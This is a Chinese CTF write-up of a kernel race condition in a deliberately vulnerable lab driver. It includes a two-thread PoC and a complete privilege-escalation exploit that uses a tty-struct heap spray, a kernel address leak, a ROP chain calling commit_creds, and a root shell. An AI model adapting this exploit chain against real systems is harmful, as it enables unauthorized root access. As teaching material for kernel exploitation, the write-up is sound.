通过条件竞争实现内核提权

news2024/10/6 6:50:04

条件竞争漏洞(Race Condition Vulnerability)是一种在多线程或多进程并发执行时可能导致不正确行为或数据损坏的安全问题。这种漏洞通常发生在多个线程或进程试图访问和修改共享资源(如内存、文件、网络连接等)时,由于执行顺序不确定或没有适当的同步措施,导致竞争条件的发生并且条件竞争在内核中也经常出现。

LK01-4

这里以一道例题作为例子介绍条件竞争在内核中的利用。

open模块

题目链接:https://github.com/h0pe-ay/Kernel-Pwn/tree/master/LK01-4/LK01-4

open模块相较于LK01-3增加了锁的判断,当执行过open模块之后,mutex会被设置为1,这样可以避免第二次执行open模块时,有两个文件描述符指向同一块内存。

static int module_open(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_open called\n");

  if (mutex) {
    printk(KERN_INFO "resource is busy");
    return -EBUSY;
  }
  mutex = 1;

  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
  if (!g_buf) {
    printk(KERN_INFO "kmalloc failed");
    return -ENOMEM;
  }

  return 0;
}

例如以下代码,连续执行两遍open模块时,第二次执行会返回-1

#include <stdio.h>
#include <fcntl.h>
int main()
{
	int fd1 = open("/dev/holstein",O_RDWR);
	printf("fd1:%d\n",fd1);
	
	int fd2 = open("/dev/holstein",O_RDWR);
	printf("fd2:%d\n",fd2);
	
}

image-20230921160911373

单线程下执行的流程如下。

image-20230924124535907

但是上述情况会在多线程的情况下出现潜在的问题。由于线程1与线程2会切换执行,那么就有可能会出现以下情况,在线程1执行open模块时,在处于判断mutex = 1这个赋值操作之前,而在mutext == 1这个判断语句之后切换到线程2,那么线程2在执行mutext == 1时,线程1还没有完成赋值操作,因此线程2会认为是第一次执行open模块,从而获得指向g_buf的文件描述符,而在线程2切回到线程1时,由于此时线程1已经指向完判断语句了,因此也会成功获取指向g_buf的文件描述符,因此会构成存在两个指针指向同一块区域的情况,从而造成后续的UAF漏洞的利用。

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

image-20230924125005531

POC

为了验证上述的可能性,我们需要创建两个线程并且两个线程需要不断的调用open模块。我们需要注意以下几点。

  • 首先是POC使用了34作为新打开的文件描述符,这是因为012是标准流,因此新打开的文件应该是从3开始分配。但是避免不是从3开始分配,我们可以使用作者提供的exp,打开临时文件去判断下一个文件描述符是什么。
  • 其次是在条件竞争利用失败的时候,我们需要关闭文件描述符,这是因为若不关闭,那么上述两个线程竞争的情况就不会发生了,因为已经通过open模块获取了文件描述符,那么mutext已经被设置为1,那么就不会存在mutext被设置为1之前的情况了。
  • 然后在文件描述符为4的时候,说明已经通过条件竞争成功执行两次open模块,但是这里还需要去验证文件描述符是否有效,这是因为有可能出现线程1获取的文件描述符为3,而线程二获取的文件描述符为4,但是线程1先进入了if (fd != -1 && success == 0)的判断,那么就会把文件描述符3给关闭了,就导致即使正常执行了两次open模块,但是只有4能够使用。
  • 最后就是验证34是否指向同一块内存了。
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <pthread.h>
#include <string.h>
int success = 0;
void *thread_function(void *arg) {
	while(1)
	{
		while (!success)
		{
			int fd = open("/dev/holstein",O_RDWR);
			if (fd == 4)
				success = 1;
			if (fd != -1 && success == 0)
				close(fd);
		}
		if (write(3, "a", 1) != 1 || write(4, "a", 1) != 1)
		{
			close(3);
			close(4);
			success = 0;
		} 
		else
			break;
	}
	
}

int main()
{
	pthread_t thread_id1, thread_id2;
	if (pthread_create(&thread_id1, NULL, thread_function, NULL) != 0)
	{
		fprintf(stderr, "thread error\n");
		return 1;
	}
	if (pthread_create(&thread_id2, NULL, thread_function, NULL) != 0)
	{
		fprintf(stderr, "thread error\n");
		return 1;
	}
	pthread_join(thread_id1, NULL);
	pthread_join(thread_id2, NULL);	
	char temp[0x20]= {};
	write(3, "abcdefg", 7);
	read(4, temp, 7);
	if (strcmp(temp, "abcdefg"))
	{
		puts("fail\n");
		exit(-1);
	}
	printf("sucess\n");
}

run.sh

这里可以看到-smp的选项为2,“-smp” 表示 “Symmetric MultiProcessing”,即对称多处理。在虚拟化环境中,这个参数用于设置虚拟机使用的虚拟处理器核心数量。在这种情况下,“-smp 2” 表示将虚拟机配置为使用 2 个虚拟处理器核心,使其能够同时运行两个线程或进程。因此题目给的环境意在使用多线程竞争进行提权。

#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -nographic \
    -kernel bzImage \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
    -no-reboot \
    -cpu qemu64,+smap,+smep \
    -smp 2 \
    -monitor /dev/null \
    -initrd initramfs.cpio.gz \
    -net nic,model=virtio \
    -net user \
    -s

exp

因此提权的过程则是首先使用条件竞争的漏洞使得open模块执行两次,使得两个文件描述符指向同一个内存区域,接着关闭一个文件描述符使得UAF漏洞,并且分配大小属于tty结构体的范围内,因此通过堆喷使得tty结构体被控制,紧接着篡改ops指针为栈迁移的gadget地址,配合ioctl函数控制rdx寄存,将栈迁移到g_buf上,然后就是通过prepare_kernel_cred -> commit_creds -> swapgs_restore_regs_and_return_to_usermode的序列完成提权操作。

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <pthread.h>
#include <string.h>

//0xffffffff81137da8: push rdx; add byte ptr [rbx + 0x41], bl; pop rsp; pop rbp; ret;
//0xffffffff810d5ba9: push rcx; or al, 0; add byte ptr [rax + 0xf], cl; mov edi, 0x8d480243; pop rsp; re
//0xffffffff810b13c5: pop rdi; ret;
//ffffffff81072580 T prepare_kernel_cred
//ffffffff810723e0 T commit_creds
//0xffffffff8165094b: mov rdi, rax; rep movsq qword ptr [rdi], qword ptr [rsi]; ret; 
//0xffffffff81c6bfe0: pop rcx; ret; 
//ffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode
//0xffffffff810012b0: pop rcx; pop rdx; pop rsi; pop rdi; pop rbp; ret;

#define push_rdx_pop_rsp 0x137da8
#define pop_rdi_ret 0xb13c5
#define prepare_kernel_cred 0x72580
#define commit_creds 0x723e0
#define pop_rcx_ret 0xc6bfe0
#define mov_rdi_rax 0x65094b
#define swapgs_restore 0x800e10
#define pop_rcx_5 0x12b0

unsigned long user_cs, user_sp, user_ss, user_rflags;



void backdoor()
{
	printf("****getshell****");
	system("id");
	system("/bin/sh");
}

void save_user_land()
{
	__asm__(
		".intel_syntax noprefix;"
		"mov user_cs, cs;"
		"mov user_sp, rsp;"
		"mov user_ss, ss;"
		"pushf;"
		"pop user_rflags;"
		".att_syntax;"
	);
	puts("[*] Saved userland registers");
	printf("[#] cs: 0x%lx \n", user_cs);
	printf("[#] ss: 0x%lx \n", user_ss);
	printf("[#] rsp: 0x%lx \n", user_sp);
	printf("[#] rflags: 0x%lx \n", user_rflags);
	printf("[#] backdoor: 0x%lx \n\n", backdoor);
}

int success = 0;
void *thread_function(void *arg) {
	while(1)
	{
		while (!success)
		{
			int fd = open("/dev/holstein",O_RDWR);
			if (fd == 4)
				success = 1;
			if (fd != -1 && success == 0)
				close(fd);
		}
		if (write(3, "a", 1) != 1 || write(4, "a", 1) != 1)
		{
			close(3);
			close(4);
			success = 0;
		} 
		else
			break;
	}
	
}
int main()
{
	pthread_t thread_id1, thread_id2;
	int spray[200];
	save_user_land();
	if (pthread_create(&thread_id1, NULL, thread_function, NULL) != 0)
	{
		fprintf(stderr, "thread error\n");
		return 1;
	}
	if (pthread_create(&thread_id2, NULL, thread_function, NULL) != 0)
	{
		fprintf(stderr, "thread error\n");
		return 1;
	}
	pthread_join(thread_id1, NULL);
	pthread_join(thread_id2, NULL);	
	char temp[0x20]= {};
	write(3, "abcdefg", 7);
	read(4, temp, 7);
	printf("temp:%s\n", temp);
	if (strcmp(temp, "abcdefg"))
	{
		puts("failure\n");
		exit(-1);
	}
	if (!strcmp(temp,"abcdefg"))
	{
		printf("sucess\n");
		close(4);
		for (int i = 0; i < 50; i++)
		{
			spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
			if (spray[i] == -1)
			{
				printf("error!\n");
				exit(-1);
			}
		}
		char buf[0x400];
		read(3, buf, 0x400);
		unsigned long *p = (unsigned long *)&buf;
		for (unsigned int i = 0; i < 0x80; i++)
			printf("[%x]:addr:0x%lx\n",i,p[i]);
		unsigned long kernel_address = p[3];
		unsigned long heap_address = p[7];
		if ((kernel_address >> 32) != 0xffffffff)
		{
			printf("leak error!\n");
			exit(-1);	
		}
		else
			printf("leak 	sucess\n");
		unsigned long kernel_base = kernel_address - 0xc3afe0;
		unsigned long g_buf = heap_address - 0x38;
		printf("kernel_base:0x%lx\ng_buf:0x%lx\n", kernel_base, g_buf);
		//getchar();	
		*(unsigned long *)&buf[0x18] = g_buf;
		p[0xc] = push_rdx_pop_rsp + kernel_base;
		//for (unsigned long i = 0xd; i < 0x80; i++)
		//	p[i] = g_buf + i;
		int index = 0x21;
		p[index++] = pop_rdi_ret + kernel_base;
		p[index++] = 0;
		p[index++] = prepare_kernel_cred + kernel_base;
		p[index++] = pop_rcx_5 + kernel_base;
		p[index++] = 0;
		p[index++] = 0;
		p[index++] = 0;
		p[index++] = 0;
		p[index++] = 0;
		p[index++] = mov_rdi_rax + kernel_base;
		p[index++] = commit_creds + kernel_base;
		p[index++] = swapgs_restore + kernel_base + 22;
		p[index++] = 0;
		p[index++] = 0;
		p[index++] = (unsigned long)backdoor;
    		p[index++] = user_cs;
    		p[index++] = user_rflags;
    		p[index++] = user_sp;
    		p[index++] = user_ss;  		
		write(3, buf, 0x400);	
		ioctl(4, 0, g_buf + 0x100); 		
	}
	return 0;	
}

CPU Affinity(CPU 亲和性)

这里作者用了CPU Affinity提高了条件竞争的成功率,在如今多核的处理器下,我们可以将不同的线程绑定在不同的核上,使得线程进程不会进行来回切换的操作,提高执行效率。那么对应在这道题上,我们可以把线程1绑定在CPU 0上运行,线程2绑定在CPU 1上,那么使得线程1与线程2可以并行运行,那么触发漏洞的可能性会大大提升。

首先初始化CPU集合,然后将绑定到指定的核上,然后在线程内部通过sched_setaffinity 函数设置 CPU 亲和性。

#define _GNU_SOURCE
#include <sched.h>

...
	cpu_set_t t1_cpu, t2_cpu;
	CPU_ZERO(&t1_cpu);
	CPU_ZERO(&t2_cpu);
	CPU_SET(0, &t1_cpu);
	CPU_SET(1, &t2_cpu);
...
	if (pthread_create(&thread_id1, NULL, thread_function, (void *)&t1_cpu) != 0)
	{
		fprintf(stderr, "thread error\n");
		return 1;
	}
	if (pthread_create(&thread_id2, NULL, thread_function, (void *)&t2_cpu) != 0)
	{
		fprintf(stderr, "thread error\n");
		return 1;
	}    

void *thread_function(void *arg) {
	cpu_set_t *cpu_set = (cpu_set_t  *)arg;
	int result = sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set);
    ...
}    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1125278.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

There are not enough slots available in the system to satisfy the 48 slots报错

文章目录 问题描述解决办法 问题描述 多核运行时出现这个错误&#xff0c;减少核数运行正常 解决办法 输出命令 vim ~/.bashrc添加 alias mpirunmpirun --oversubscribe执行命令 source ~/.bashrc解决。

imu预积分学习(更新中)

imu预积分学习&#xff08;更新中&#xff09; IMU预积分可以做什么&#xff1f; 以上面那个经典图片为例子&#xff0c;IMU可以通过六轴数据&#xff0c;拿到第i帧和第j帧之间的相对位姿&#xff0c;这样不就可以去用来添加约束了吗 但是有一个比较大的问题是&#xff1a; I…

电脑技巧:27个Office使用小技巧,值得收藏

目录 一、Word 二、EXCEL 三、附文&#xff1a;Word和Excel快捷键 我们中的绝大部分人都使用微软的Office&#xff0c;但是我们是否都了解如何能够最有效地使用它&#xff1f;我们在这里列举了一些关于使用Word和Excel的窍门。 我们使用最多的软件可能就是办公软件了——字…

C++数据结构X篇_19_排序基本概念及冒泡排序(重点是核心代码)

文章目录 1. 排序基本概念2. 冒泡排序2.1 核心代码2.2 冒泡排序代码2.3 查看冒泡排序的时间消耗2.4 冒泡排序改进版减小时间消耗 1. 排序基本概念 现实生活中排序很重要&#xff0c;例如:淘宝按条件搜索的结果展示等。 概念 排序是计算机内经常进行的一种操作&#xff0c;其目…

计算机网络(谢希仁)第八版课后题答案(第一章)

1.计算机网络可以向用户提供哪些服务 连通性:计算机网络使上网用户之间可以交换信息&#xff0c;好像这些用户的计算机都可以彼此直接连通一样。 共享:指资源共享。可以是信息、软件&#xff0c;也可以是硬件共享。 2.试简述分组交换的要点 采用了存储转发技术。把报文(要发…

Python 测试框架unittest和pytest的优劣

一、Unittest Unittest是Python标准库中自带的单元测试框架&#xff0c;Unittest有时候也被称为PyUnit&#xff0c;就像JUnit是Java语言的标准单元测试框架一样&#xff0c;Unittest则是Python语言的标准单元测试框架。 Unittest支持自动化测试&#xff0c;测试用例的初始化、…

【Chrome】使用k8s、docker部署无头浏览器Headless,Java调用示例

什么是无头浏览器&#xff1f; 无头浏览器是一种没有图形用户界面的浏览器。无头浏览器不通过其图形用户界面(GUI)控制浏览器的操作&#xff0c;而是使用命令行。 为什么要用Chrome无头&#xff1f; Chrome Headless用于抓取(谷歌)、测试(开发者)和黑客(黑客)。搜索引擎&…

【单元测试】--高级主题

一、模拟与存根深入 在单元测试中&#xff0c;模拟&#xff08;Mock&#xff09;和存根&#xff08;Stub&#xff09;是两种常用的测试替代品&#xff0c;用于模拟外部依赖或模拟特定行为&#xff0c;以便测试能够独立运行。以下是深入了解模拟与存根的概念&#xff0c;以NUni…

opencv dnn模块 示例(19) 目标检测 object_detection 之 yolox

文章目录 0、前言1、网络介绍1.1、输入1.2、Backbone主干网络1.3、Neck1.4、Prediction预测输出1.4.1、Decoupled Head解耦头1.4.2、Anchor-Free1.4.3、标签分配1.4.4、Loss计算 1.5、Yolox-s、l、m、x系列1.6、轻量级网络研究1.6.1、轻量级网络1.6.2、数据增强的优缺点 1.7、Y…

多态的使用以及多态底层的实现(下)

经过之前的学习我们知道了&#xff0c;继承能够实现多态的原理就是&#xff0c;在继承的父类和子类中各自存在一个虚表&#xff0c;父类和子类的虚表中各自储存了自己的虚函数&#xff0c;不同的点就是如果我们完成了虚函数的重写&#xff0c;那么子类&#xff08;派生类&#…

【C++】继承 ⑧ ( 继承 + 组合 模式的类对象 构造函数 和 析构函数 调用规则 )

文章目录 一、继承 组合 模式的类对象 构造函数和析构函数调用规则1、场景说明2、调用规则 二、完整代码示例分析1、代码分析2、代码示例 一、继承 组合 模式的类对象 构造函数和析构函数调用规则 1、场景说明 如果一个类 既 继承了 基类 ,又 在类中 维护了一个 其它类型 的…

C指针 --- 初阶

目录 1. 指针是什么 2. 指针和指针类型 1. 指针 - 整数 2. 不同指针类型的解引用 3. 野指针 3.1. 野指针的形成原因&#xff1a; 1. 指针未初始化 2. 已释放的指针 3. 悬挂指针 3.2. 如何规避野指针 4. 指针运算 4.1. 指针 - 整数 4.2. 指针 - 指针 4.3. 指针的关…

C语言实现调整数组中奇数偶数顺序

目录 1.思路2. 代码 1.思路 给定两个下标left和right&#xff0c;left放在数组的起始位置&#xff0c;right放在数组中最后一个元素的位置循环进行一下操作 a. 如果left和right表示的区间[left, right]有效&#xff0c;进行b&#xff0c;否则结束循环 b. left从前往后找&#…

关于 硬盘

关于 硬盘 1. 机械硬盘1.1 基本概念1.2 工作原理1.3 寻址方式1.4 磁盘磁记录方式 2. 固态硬盘2.1 基本概念2.2 工作原理 1. 机械硬盘 1.1 基本概念 机械硬盘即是传统普通硬盘&#xff0c;硬盘的物理结构一般由磁头与盘片、电动机、主控芯片与排线等部件组成。 所有的数据都是…

网络拓扑图怎么画最好?

你们好&#xff0c;我的网工朋友。 好久没和你们聊拓扑图了&#xff0c;群里总是不乏有人问&#xff0c;拓扑图怎么设计&#xff0c;怎么配置&#xff0c;或者让大佬看看自己做的这图有没有啥问题的…… 画拓扑图的方式有很多&#xff0c;在线软件&#xff0c;Visio&#xff…

比例运算放大电路为什么要加平衡电阻

这个是反相比例运算放大电路&#xff0c;输出电压等于-Rf/R1乘以输入电压。 这个是同相比例运算放大电路&#xff0c;输出电压等于1Rf/R1乘以输入电压。 大家可以看到这两个电路中&#xff0c;都有一个电阻R2&#xff0c;反相比例运算放大电路放在同相端到地&#xff0c;同相比…

空间地图GIS基础

一、GIS基本概念 地理信息系统&#xff08;Geographic Informaiton System, GIS&#xff09;是一个可以建立、浏览、查询、分析地理空间数据的软件系统&#xff0c;其功能小至地图的展示&#xff0c;大至空间决策分析与支持。 1.GIS基础 (1)地理信息系统(GIS)的概念与组成 …

# 开发趋势 Java Lambda 表达式 第三篇

开发趋势 Java Lambda 表达式 第三篇 一&#xff0c;Lambda 整合集合常规操作 List Java Lambda 表达式可以与List集合和常规操作进行整合&#xff0c;以提供一种更简洁、更可读的代码编写方式。以下是几个示例&#xff1a; 集合遍历操作&#xff1a; List<String> n…

PI证书导入总结

当我们在用pi调用https的方式时&#xff0c;接口会报错提示iaik.security.ssl.SSLCertificateException。这需要我们导入对应的证书。 一.下载证书 根据对方提供的url &#xff0c;在浏览器中输入&#xff0c;点击锁头图标&#xff0c;点击证书信息 二.点击详细信息标签&…

【蓝桥每日一题]-动态规划 (保姆级教程 篇11)#方格取数2.0 #传纸条

目录 题目&#xff1a;方格取数 思路&#xff1a; 题目&#xff1a;传纸条 思路&#xff1a; 题目&#xff1a;方格取数 &#xff08;跑两次&#xff09; 思路&#xff1a; 如果记录一种方案后再去跑另一个方案&#xff0c;影响因素太多了&#xff0c;所以两个方案要同时开…